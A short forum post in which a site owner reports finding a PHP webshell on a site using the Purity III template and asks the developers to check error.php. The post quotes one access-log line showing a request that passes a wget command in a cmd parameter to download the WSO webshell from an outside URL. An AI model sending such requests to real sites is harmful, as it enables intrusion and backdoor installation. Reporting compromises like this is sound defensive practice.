Today I found the exploit Backdoor: PHP/WebShell.A, on my site that uses Purity III.
When looking through the logs, I found the exploit seems to have been delivered here:
Evil-IP - - [DATE:Time] "GET //templates/purity_iii/error.php?cmd=wget%20https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
I do not know if that means that purity_iii/error.php has a fault in it that causes this exploit, but thought it best to report to you, so you can check. I did try to report it privately, through your chat, but was redirected to the forums